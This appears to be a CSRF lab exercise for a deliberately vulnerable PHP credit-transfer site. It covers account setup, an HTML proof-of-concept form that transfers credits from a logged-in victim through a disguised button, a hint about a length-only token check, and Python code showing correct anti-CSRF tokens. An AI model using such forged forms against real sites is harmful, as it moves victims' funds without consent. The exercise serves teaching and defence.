
Instructions:

  1. Creating an Account:
    • Navigate to the "Register" section.
    • Enter a unique username.
    • Enter a password.
    • Click on the "Register" button.
    • If successful, you will see a message saying "Registration successful!".
  2. Logging In:
    • Navigate to the "Login" section.
    • Enter the username and password you registered with.
    • Click on the "Login" button.
    • If successful, you will see options for transferring credits and your current credit balance.
  3. Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge. To find the exploit, try entering a CSRF token of the same length and adding it to the HTML PoC.
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>CSRF PoC</title>
    </head>
    <body>

    <h2>CSRF Attack Example</h2>

    <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>

    <!-- The hidden fields mirror the original transfer form; the token value
         is the blank you fill in as described in the hint above. -->
    <form action="TARGET_URL" method="post">
        <input type="hidden" name="receiver" value="user1">
        <input type="hidden" name="amount" value="100">
        <input type="hidden" name="csrf_token" value="........">

        <input type="submit" value="Click me for a surprise!">
    </form>

    </body>
    </html>
    • Create an HTML page with the necessary form.
    • Replace `TARGET_URL` with the URL where the original PHP page is hosted.
    • When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.
  4. Testing the CSRF PoC:
    • Log in to the original PHP website with any user account (e.g., user2).
    • Visit the crafted CSRF PoC HTML page you created.
    • Click on the provided button.
    • Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
  5. Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
    • Generate a unique token for every form displayed to the user.
    • Store this token in the user's session and also send it as a hidden field in the form.
    • On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
    • This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.
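The token scheme from step 5, as an added framework-independent example (not code from the lab itself), with the session modelled as a plain dict. `weak_length_only_check` is a hypothetical check that only compares token length, assumed here as the kind of check the hint in step 3 suggests the transfer page uses; it is shown beside the correct comparison so the difference is visible.

```python
import hmac
import html
import secrets

TOKEN_BYTES = 32  # 256 bits of randomness; token_hex renders it as 64 hex chars

def issue_token(session: dict) -> str:
    """Steps 1-2: mint a fresh token and store it in the user's session.
    The session is modelled as a plain dict (in the PHP app: $_SESSION)."""
    token = secrets.token_hex(TOKEN_BYTES)
    session["csrf_token"] = token
    return token

def render_transfer_form(session: dict, action: str) -> str:
    """Step 2: emit the transfer form with the token as a hidden field."""
    token = issue_token(session)
    return (
        f'<form action="{html.escape(action, quote=True)}" method="post">\n'
        '  <input type="text" name="receiver">\n'
        '  <input type="number" name="amount">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input type="submit" value="Transfer">\n'
        "</form>"
    )

def verify_token(session: dict, submitted) -> bool:
    """Step 3: accept only if the submitted value equals the session token.
    compare_digest keeps the comparison constant-time."""
    expected = session.get("csrf_token")
    if expected is None or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)

def weak_length_only_check(session: dict, submitted) -> bool:
    """Hypothetical broken check (assumed, not taken from the lab): it only
    compares lengths, so any value of the right length passes."""
    expected = session.get("csrf_token")
    return (expected is not None and isinstance(submitted, str)
            and len(submitted) == len(expected))

def handle_transfer(session: dict, form: dict) -> str:
    """Transfer endpoint: verify the token before touching any credits."""
    if not verify_token(session, form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {form['amount']} credits to {form['receiver']}"
```

In the PHP app the same three steps map onto random_bytes()/bin2hex() for generation, $_SESSION for storage and hash_equals() for the comparison.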
Users and Credits

Username  Credits
user1     5000
user2     4500
user3     4000